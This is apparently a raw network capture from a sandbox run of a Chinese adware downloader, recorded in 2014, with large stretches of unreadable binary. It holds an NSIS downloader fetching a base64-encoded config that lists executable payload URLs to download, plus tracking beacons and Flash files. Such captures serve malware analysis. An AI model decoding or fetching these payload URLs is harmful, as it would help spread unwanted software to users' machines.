)).9.........J.....X.........x....F0o...[..L.w...vq........=.z..:.....
.....'....[.,./..UT........\..|.1...q...)..h8..j...1........u.^.w). .@
..p RD.qxPr.>.*MX..aO.uJ.._..Sm.....]....l..x...KDU......u...X.8$ .
.......m....H..<..m.<..7.sgV..%..%...u...W..|.....%....=...2....
M..9.J5..:..%d.k..\1..E...W.M..?....CjE.f.L".6`.....).. .#..V.dE.'.(..
...ZZ.."D.U.Sg...B..`.?.]A.....Y[>./.UZ/8........$*.c..7.v.e.$..r..
DX|N.6.A.."....=$V..N.k.}).Hd.3.../..U..2QP.R.5..<.J.B"R..._.....N.
.....wW........P..")4....t:q.C.b..".H...(.?@..&.c...&.[.......4..e...g
6Qn....>T..G..~ H0..a.=..L...;3#..2...,....)z..{T.b.3..0.A.g0.k...|
[email protected]..[.9z.D.m......K%*.f.......U<.p.......F...,b.&}..c...G..
...H.....,.ot.....c..I.. w...f...gi8.jA.H..T..b,\.L.UA....ig.....-4...
.!..b~....=o..c.`....pJ/.k..Q..1.|."...X....*.....m..6($..?~.n:y.F.-H\
v..X?.Tx.....thW..H..i..e.".d..W..v....|5.1-].4a.........O..ah#..L
<<< skipped >>>


GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=1179648-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:58 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 27872
Content-Range: bytes 1179648-1207519/1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
.6.7.7.7.8.8.8.8.8.9.9.9.9.:.:.:.:s;.;.;.;.<.=.=<=Y=.=#>5>
\>y>.>c?r?.?.?.`.......0%0L0i0.0.0.0.1$1.1.1.1.1.2.2c2r2.2.2.
3.3<3Y3.3.3.3.3.4s4.4.4.4.4.5S5b5.5.5.5.696k6p6.6.6.6S7e7.7.7.7.738
B8d8.8.8.8.9K9P9.9.9.:.:c:u:.:.:.:.:C;R;t;.;.;.;.;.<K<P<.<
.<.<.<#=5=\=y=.=.=.?.?.?.p.......0n0.0.0.1)1.1.2"2D2k2.2.2.2.
2 303.3.3.3.3.4%4L4i4.4.4.6%6L6i6'7`7.7.7.7.8.8C9R9t9.93:E:l:.:.:.:.;"
;D;.;.;.<,<I<{<.<c=u=.=.=C>R>t>.>.>.>
.?K?P?......T...p1w1.1.1.1.1.1.1.1.1.1.1.1.122.2.2s3.3.4.4.5.5e6.6.7.7
08I8C:Q:.;.;.<I=.=.?.?....h....1.1.4.4.6.6.6s7.7.7.7l8.8.9C9.9.9.:u
<;=#>2>S>f>.>.>.?1?t?x?|?.?.?.?.?.?.?.?.?.?.?.?.?
[email protected]=5.5.5S7f7.7.8!8$:(:,:0:4:8:<:@:D:H:S:f:.:.:.;S
;d;.<.<[email protected]:F:_:.:.:.;.;.;.;.;.;.;.;.;.;.;.<.=)=b=o=.=.=
.=.=.=.>.>.... ...F1X1.3.3.5.5c<t<.<S=f=.>........#0
20Y0.0.031D1g1#242j2.2.2.2.2$3G3M3.3.3.494B4K4Q4.4.4.4.5.5k6.6.6.6c7
q7.7c9q9W:.:.:z;.;.;.;.;.<.<3<.<.<.=.=.=.=j>.>.?.
?..........30B0Q0m0.1.1.1.1.2?2y2.2.2E3P3{3c4s4.4.5.5x5.5.5.6.6.6.6.6.
6.6.7.7.7S7e7w7.878.8.8.899.9.9.9.:::]:.:.:.:*;6;B;d;r;.;.;.;.;.;.<
.<'<^<q<.?.?.?.?......p....0 0V0.1f2q2.2R3.3.3.4.4.4 4$4(4
,4044484C4R4`4.5W5.5c697.8.8.8.8Z:e:.:.;.;.;.<.<.=X=.=.=g>r
>.>.>c?v?......t...30E0W0.0.0.3.3.3.3.3.3.4.4.4.4.4.4.4.4.4.4
#565j5.537B7Q7.7.8.8d8s9.9.9.:":1:t;.;.;*<C<.<.<.<{=.&g
t;%>.?.?.?.?......D...S0c0.0.11.1.2.2.2.2S3d3.5.5.6.6.6.6.6.
<<< skipped >>>


GET /hm.js?e52aa1ba5cd407a52e95d6c7249929a9 HTTP/1.1
Accept: */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hm.baidu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Etag: e8f2447c525c8fa701ece95c4cca6b59
Cache-Control: max-age=0, must-revalidate
Content-Encoding: gzip
Content-Type: application/javascript
Set-Cookie: HMACCOUNT=CEF89CEABD29A927; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Connection: Keep-Alive
Content-Length: 5267
Date: Fri, 13 Jun 2014 17:28:53 GMT
Server: apache
...............(function(){var c={id:"e52aa1ba5cd407a52e95d6c7249929a9
",dm:["mini.fengyunzhibo.com"],etrk:[],js:"tongji.baidu.com/hm-web/js/
",icon:'',br:false,ctrk:false,align:-1,nv:-1,vdur:1800000,age:31536000
000,rec:0,rp:[],trust:0,vcard:0,..i{.F.{~...F...NB.R...h.-..z..g%.maYr
u.......C......j...{f7..h....,3bz...4)..N...C..N.$(.41.k.4..........~.
x|5.NzN...::..Q.d|....7...jEX...i8b./..........|X"...2.....<..k..&g
t;..b....i..~opn9E....df.G......Yz...~.u...:........lH`.......k2...[..
&.B4.l&..`s*.Slf.....p....>....?;[email protected]\u.
...!I..y...(.>J....Cu..r.2U......`....4.,.........q...BJ.R1J-.P#J..
%...I..O..S:"#2..4tb....=.gv.M.u3..f..o..Z..%..lb J.-...M=.]&.$....q..
4..Ng...|n.g,[.WfiY...v.sB../..4JLB...s=c..j).../.....YfZ]rL..)......h
.......w..EZf.....()A.n@.. MB....9...L....$H........Yei."..9._o.7Y..Y.
[email protected]......{......L;.y..t`.5...< sfY;=jWS~^S~......_.....
....!.......I....v<.n..L V.X....|39........R........]......L..^r..{
s^..|..{..5.u.1..{.5d..Im.....p#w.=5....{....#m...e.(.....<...E....
...uk.|./....w......>.U....1l_x...#40..;..$?.B.Xlr.....[`..ZrS,!Z..
..H..A..I..i..8e]B.G .a.dQ2$.![[email protected]`.q...nl.N.p~..2.C..[...w.`Yz..
G.<(3N..8...H.Y^...6.d....h.,c..q:...mN.g..=<=?{x$...R.A)koszny.
.#>.!P,M.....<..L...fE..~q...i....;..Z;X=.....G.....)...R..%.Y..
[..1./.D..,@S/......0........s'.r..O.$...Y.>[email protected]....
...~z.f.0..2.,$..?q.j...r...y.e...d..q-.?..c%...B.......?..4.*N..j]0}.
.B. .v..=..\ /....e.%..w.Z..N.J.....'p.i^[email protected]>)`...^..0.._...
<<< skipped >>>


POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 77
Content-Type: application/octet-stream
Host: p.x.baidu.com
Keep-Alive: timeout=600,max=1000

...A........." fc6216b45c538248534db6bb098e4fe1([email protected].` ......
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 133
...y........." fc6216b45c538248534db6bb098e4fe1(.........28"..n.8b..NI
r..,...t ..3.P.26.r...)[email protected].` ......
....


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 157
Content-Type: application/octet-stream
Host: p.x.baidu.com
Keep-Alive: timeout=600,max=1000

...y........." fc6216b45c538248534db6bb098e4fe1(.........28"..n.8b..NIr..,...t ..3.P.26.r...)[email protected].` ......t&......._(_ ss......n~ 
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 789
...y........." fc6216b45c538248534db6bb098e4fe1(.........28"..n.8b..NI
r..,...t ..3.P.26.r...)[email protected].` ......6....).
...L..........%....i......=i....)3....J......;...:...Qb..<[.aM..f.|
. [email protected]|.k.V..~0..PFk........A&...w...M. .=.m
.. .....t.#'....9.f.\.c?.1...n-.5I.14?...|]....^....NX.S.O..%.E../!U..
...gY..d....N.mS....W..g.3h.u...^..y.|..h........H............x[...I..
...x$..y\[email protected].`..F,.)S...:.......Vq?...l....bkeBBQ....k...#
..V).O.........m.._.......R.9.S.IGo..'.x...[..3.M......h.RZn.F-...$Os.
-..q9.G.3b0!..h.....;6....5..C .......".}./U.T.....U.c.....h.0Gh}.3 ..
.R..:..2HT$.o....<.R".......h lJ..`.C`.*~.......'.H(@Ze.w..DW... ..
...<.;r?....RH.;....%.._....}[email protected].]TwH..
.A..W..RUX.Spz.|......JI,q....



GET /0403/help1.html HTTP/1.0
Host: update.aiqingzhihui.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:28:32 GMT
Content-Length: 570
Content-Type: text/html
Last-Modified: Wed, 11 Jun 2014 03:51:53 GMT
Connection: Close
ETag: "f48b947b2885cf1:2011"
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Fw-Via: MISS from ctl-zj-033-088.fcd, DISK HIT from ctl-gd-117-187.fcd
TRW2VjdF0KOTc9MQo5OD0xCjk5PTEKMTAwPTEKMTAxPTEKMTAyPTEKMTAzPTEKMTA0PTEK
MTA1PTEKMTA2PTEKMTA3PTEKMTA4PTEKMTA5PTEKMTEwPTEKMTExPTEKMTEyPTEKMTEzPT
EKMTE0PTEKMTE1PTEKMTE2PTEKMTE3PTEKMTE4PTEKMTE5PTEKMTIwPTEKMTIxPTEKMTIy
PTEKMTIzPTEKMTI0PTEKMTI1PTEKMTI2PTEKMTI3PTEKMTI4PTEKMTI5PTEKMTMwPTEKMT
MxPTEKMTMyPTEKMTMzPTEKMTM0PTEKMTM1PTEKMTM2PTEKMTM3PTEKW3JlY10KMD1odHRw
Oi8vZG93bi5sYW9jaGVoZS5jb20vMDUyMy9wY3l5XzY4XzIuZ2lmCjE9aHR0cDovL2Nkbj
EuZG93bi4xNzE3M2llLmNvbS9pZS9kb3dubG9hZGVyL194aHptMDZfcy5leGUKW2Rpcl0K
MD1wY3l5XzY4XzIuZXhlCjE9X3hoem0wNl9zLmV4ZQpbZ10KMD0xCltwYV0KMD0xCltlZF
0KRTA9MQ==..



GET /sync.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=3&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=728&rsi1=90&rsi5=4<r=<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=18a90fef6d4567e7&ps=357x3&tn=text_default_728_90&ts=1&td_id=1537506&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537506
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cpro.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:04 GMT
Content-Type: text/html
Last-Modified: Wed, 07 May 2014 11:40:06 GMT
Transfer-Encoding: chunked
Connection: close
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Content-Encoding: gzip
37d.............VQo.6.~..`.. 3.Z.=.v.......d.C...E.mn.$.T.....QtmI.\..
.lQ....w..9z}.qz....,.*{.j...?..h.2}7..GC...:...V.]:..%...... .. .;=..
*.......s#[email protected]^..."',..[K.i.P5-T....e@:....1.k_....V..u."...........j.
..9......(.....6".........0.T...kc.t.....z..D.p...Ow0..:......(..H.u..
..^....aq.P2..<.N./$./.../......o8...@1%v5........I_.....%..29...c{
......./=....# 1.R......Z%`(..k....E.....=9G.".<.n..X*...GH.6.G.R.S
...5Q.eR..-...!..zg#<#..S0.z.sV...W.......|..lu%.s%u.L.z.t..P..*.A5
.i.>...Lv%.s...I...63.......P.7....." ..'b.....Ub.ao.XI..,9L...2...
dBRPE.../......#).,G0..1h x......I.P.r}(..L.E..........u-7`|.].&.X...f
.,F.g1.(Nb.o...R....d........2:...xyN.1.dnZ.N>d...z.M.........H.N .
...;g..t.A....j.9!..........3..^&.....ZoZ.M....G..H...Jv..o..fz.Q7....
-...W.....,..y.v. ..../.i....1...s..>....[.&.u.?..6...*....3.q.../.
;.I.|.o..>.I..Rv....c.)'.v.2f.Q&.98..L..C.......Uc..kh....ps}.WZ...
...........0..



GET /report.gif?act=load&ver=nor&app=player&url=http://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=&cid=fengyun_693619_1371525642501&host=tv.aiqingzhihui.com&device=pc&localId=1402680558.822_176117610932921373056&rd=0.29551827581599355 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: player.log.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: ngx_openresty/1.2.6.6
Date: Fri, 13 Jun 2014 17:29:18 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: keep-alive
Set-Cookie: _uid=1402680558.276_3849dc759772bdef0005a56a45340f99; domain=log.kukuplay.com; path=/; expires=Wed, 30-Oct-2041 01:29:18 GMT
Set-Cookie: _sid=1402680558.276_5826ebfd9fb3ac4faecb181ac2e1a592; domain=log.kukuplay.com; path=/
Set-Cookie: _lsid=1402680558.276_3b13680dfbf594d4526fb6d329e78252; domain=log.kukuplay.com; path=/; expires=Sat, 14-Jun-2014 01:59:18 GMT
Set-Cookie: _appStartId=1402680558.276_03bb3a3dec221c47fbe8d25b9c9cd403; domain=player.log.kukuplay.com; path=/; expires=Wed, 30-Oct-2041 01:29:18 GMT
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Expires: Fri, 01 Jan 1980 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: ng
x_openresty/1.2.6.6..Date: Fri, 13 Jun 2014 17:29:18 GMT..Content-Type
: image/gif..Content-Length: 43..Last-Modified: Mon, 28 Sep 1970 06:00
:00 GMT..Connection: keep-alive..Set-Cookie: _uid=1402680558.276_3849d
c759772bdef0005a56a45340f99; domain=log.kukuplay.com; path=/; expires=
Wed, 30-Oct-2041 01:29:18 GMT..Set-Cookie: _sid=1402680558.276_5826ebf
d9fb3ac4faecb181ac2e1a592; domain=log.kukuplay.com; path=/..Set-Cookie
: _lsid=1402680558.276_3b13680dfbf594d4526fb6d329e78252; domain=log.ku
kuplay.com; path=/; expires=Sat, 14-Jun-2014 01:59:18 GMT..Set-Cookie:
 _appStartId=1402680558.276_03bb3a3dec221c47fbe8d25b9c9cd403; domain=p
layer.log.kukuplay.com; path=/; expires=Wed, 30-Oct-2041 01:29:18 GMT.
.P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND
 CNT'..Expires: Fri, 01 Jan 1980 00:00:00 GMT..Pragma: no-cache..Cache
-Control: no-cache, max-age=0, must-revalidate..GIF89a.............!..
.....,...........L..;..
<<< skipped >>>


GET /media/v1/0f0002dsZcSR_Ik2MbXxf0.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_5553832
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:13 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 2826
Cache-Control: max-age=31536000
Expires: Fri, 13 Mar 2015 10:29:01 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
CWS.s...x..Wkp....w.....X....&....Z.y.....86.X.-...X.... KBZ'2.T.c.fR.
M.<..m.d..<....uL.M)C..i.....q:.....M....'.t:..>.9.y.s..s...\
.\..B.........!..Q.pCw[;....b.x.../....s...U.k....gu}}...q..TbDel<$
...PluySFA.........Xe...1ysy.5.>....X4.Q...RP..Br.Y]U......pt....H$
..yE.3^........... ..7:o...1*.r8...F...h.}...#cB0..K.#nR.....RS....U..
Q.3$V....A.....dQ..ws.M..m.<......T&Kq9..,..FW A>42..HMR...... e
l...T.Us..5.55l5.P[...g.).F.wb.......L.d#h%.......[./.tm..cv.......L..
 iW8... ..p...@ ...oh8.......K..x..H=J..]........npLS..Q.$..U...~...S.
..J.I8.Z.c..v..*..,.P....di......i......%...d/..... .;............9.8.
..{l.....K......./....Lr.G..6........^[email protected]....
';.?BI.g..G..\.q#8.m..F]./...|.&..X'N0....~Uxy._6-=.O..C.e.........$..
.....3?4.<.E....t.3.,.Lu..G..-y.DEM..k.y...jR...j..0K.f)..........'
.^u./.1..:.?.........d.q|...........T..x.ok...Pg..6]m.c.B.....;h:....Z
...T...U.j)...i..5...y...A....*..)5.6y.U....n`Cs%...i.........|i...vm.
....%zg.X...v....;.I/Nc.. Vq&e).>gO....U..e.By...7...quS...SL..o.2.
K...q..R.t}d.0.l...\..L.Zb..6..Z_....S.$.......4S......../mx.......P..
..i8h:bk...._%..x......~.3../.Iz..A\.`:g...T.......x..\....../..S...X.
....7.\...T...../...z..y{2...H&....9.#l..3.h.'<[email protected]
jv..M..1k.y.....]...~..Lu..t.maTO../{S..P........$U....N.iz...ea!.<
(..tcE....fz.Y.......'..7&z7......<0.R{...]YzQ?.......y(....<.2.
....i..9{....e...d4........DK..|..=.k......%..$....^.L.>..O...|.*.M
.:7..C.B.>....e.y.. .`S...x.6....eP.03..0..}....f!...~bx{...`_.
<<< skipped >>>


GET /9.gif?abc=1&rnd=1611555924 HTTP/1.1
Accept: */*
Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Server: Tengine
Date: Fri, 13 Jun 2014 17:28:49 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=0SIiDDGXogwCAcGK9Odn lhy; expires=Mon, 10-Jun-24 17:28:49 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=fbcc5022; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=4afbef3bad8d0ab648fcc91b_1402680529; expires=Mon, 10-Jun-24 17:28:49 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=0SIiDDGXogwCAcGK9Odn lhy
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 302 Found..Server:
 Tengine..Date: Fri, 13 Jun 2014 17:28:49 GMT..Content-Type: image/gif
..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CUR
a ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=0SIiDDGXog
wCAcGK9Odn lhy; expires=Mon, 10-Jun-24 17:28:49 GMT; path=/; domain=.m
mstat.com..Set-Cookie: sca=fbcc5022; path=/; domain=.cnzz.mmstat.com..
Set-Cookie: atpsida=4afbef3bad8d0ab648fcc91b_1402680529; expires=Mon, 
10-Jun-24 17:28:49 GMT; path=/; domain=.cnzz.mmstat.com..Location: htt
p://pcookie.cnzz.com/app.gif?&cna=0SIiDDGXogwCAcGK9Odn lhy..Expires: T
hu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cach
e..GIF89a.............!.......,...........L..;..



GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=1179648-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:58 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 27872
Content-Range: bytes 1179648-1207519/1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
.6.7.7.7.8.8.8.8.8.9.9.9.9.:.:.:.:s;.;.;.;.<.=.=<=Y=.=#>5>
\>y>.>c?r?.?.?.`.......0%0L0i0.0.0.0.1$1.1.1.1.1.2.2c2r2.2.2.
3.3<3Y3.3.3.3.3.4s4.4.4.4.4.5S5b5.5.5.5.696k6p6.6.6.6S7e7.7.7.7.738
B8d8.8.8.8.9K9P9.9.9.:.:c:u:.:.:.:.:C;R;t;.;.;.;.;.<K<P<.<
.<.<.<#=5=\=y=.=.=.?.?.?.p.......0n0.0.0.1)1.1.2"2D2k2.2.2.2.
2 303.3.3.3.3.4%4L4i4.4.4.6%6L6i6'7`7.7.7.7.8.8C9R9t9.93:E:l:.:.:.:.;"
;D;.;.;.<,<I<{<.<c=u=.=.=C>R>t>.>.>.>
.?K?P?......T...p1w1.1.1.1.1.1.1.1.1.1.1.1.122.2.2s3.3.4.4.5.5e6.6.7.7
08I8C:Q:.;.;.<I=.=.?.?....h....1.1.4.4.6.6.6s7.7.7.7l8.8.9C9.9.9.:u
<;=#>2>S>f>.>.>.?1?t?x?|?.?.?.?.?.?.?.?.?.?.?.?.?
[email protected]=5.5.5S7f7.7.8!8$:(:,:0:4:8:<:@:D:H:S:f:.:.:.;S
;d;.<.<[email protected]:F:_:.:.:.;.;.;.;.;.;.;.;.;.;.;.<.=)=b=o=.=.=
.=.=.=.>.>.... ...F1X1.3.3.5.5c<t<.<S=f=.>........#0
20Y0.0.031D1g1#242j2.2.2.2.2$3G3M3.3.3.494B4K4Q4.4.4.4.5.5k6.6.6.6c7
q7.7c9q9W:.:.:z;.;.;.;.;.<.<3<.<.<.=.=.=.=j>.>.?.
?..........30B0Q0m0.1.1.1.1.2?2y2.2.2E3P3{3c4s4.4.5.5x5.5.5.6.6.6.6.6.
6.6.7.7.7S7e7w7.878.8.8.899.9.9.9.:::]:.:.:.:*;6;B;d;r;.;.;.;.;.;.<
.<'<^<q<.?.?.?.?......p....0 0V0.1f2q2.2R3.3.3.4.4.4 4$4(4
,4044484C4R4`4.5W5.5c697.8.8.8.8Z:e:.:.;.;.;.<.<.=X=.=.=g>r
>.>.>c?v?......t...30E0W0.0.0.3.3.3.3.3.3.4.4.4.4.4.4.4.4.4.4
#565j5.537B7Q7.7.8.8d8s9.9.9.:":1:t;.;.;*<C<.<.<.<{=.&g
t;%>.?.?.?.?......D...S0c0.0.11.1.2.2.2.2S3d3.5.5.6.6.6.6.6.
<<< skipped >>>


GET /adx.php?c=cz1hNGE2OWU2ZDI4YTg5MmU5AHQ9MTQwMjY4MDUzNQBzZT0xAGJ1PTEAcHJpY2U9VTVzMDF3QUl1R2Q3akVwZ1c1SUE4bF9TM3prZUV0OWt2a1hWb2cAY2htZD0xAHY9MQBpPTQxNTVkMTA2 HTTP/1.1
Accept: */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4<r=<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=cadbaab171a45209&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: wn.pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:03 GMT
Content-Type: image/gif
Content-Length: 49
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
GIF89a...................!.......,...........T..;..



GET /upload/fishrlv31.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.dl.kukuplay.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: application/x-shockwave-flash
Content-Length: 167054
Accept-Ranges: bytes
Server: pws/1.4.2.9
Date: Fri, 13 Jun 2014 07:24:07 GMT
Last-Modified: Sun, 04 May 2014 03:28:56 GMT
ETag: "5365b3f8-28c8e"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Age: 36313
X-Cache: HIT from CT-ZJWZ-251-106.fastcdn.com
Connection: keep-alive
CWS.....x....TS].....i" .U.I/.W...Mz/.B....HW...Ti......@J. %.#5..G..=
...{...........=.\s..<s..6Y~8x 88d.88.o.<...........#.ik/..L....
. X.{'............. .................j...]...x\.,.2..<...x:.{9..>
;.}oe...%....U[..0..................O.W.k..F......K.........9>?....
